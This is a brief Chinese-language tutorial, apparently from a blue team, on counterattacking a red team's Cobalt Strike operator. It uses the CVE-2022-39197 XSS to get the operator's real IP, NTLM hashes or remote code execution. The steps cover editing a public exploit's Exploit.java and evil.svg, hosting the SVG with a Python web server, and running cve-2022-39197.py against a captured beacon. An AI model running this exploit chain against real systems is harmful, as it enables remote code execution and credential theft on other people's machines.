溯源反制-远程控制工具-CobaltStrike

复现环境：
蓝队：47.106.xxx.xxx
红队：8.130.xxx.xxx
对抗Cobaltstrike中的手段：
1、伪造流量批量上线（欺骗防御）
https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw
2、利用漏洞（CVE-2022-39197）
Cobalt Strike <=4.7 XSS
• 获取真实ip地址
• 获取NTLM
• RCE
• SSRF
https://github.com/its-arun/CVE-2022-39197
取得红队木马样本开始操作如下：

修改后打包，jar包如下：

-蓝队修改EXP里面的执行命令后编译（红队客户端触发的东西在这里修改）
修改：EvilJar/src/main/java/Exploit.java
-蓝队修改svg加载地址并架设Web服务（红队的CS服务器能访问的Web服务）

修改：evil.svg 指向url地址 

python3 -m http.server 7777
目的是调用svg文件
-蓝队执行EXP调用后门上线，攻击者进程查看时触发
python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg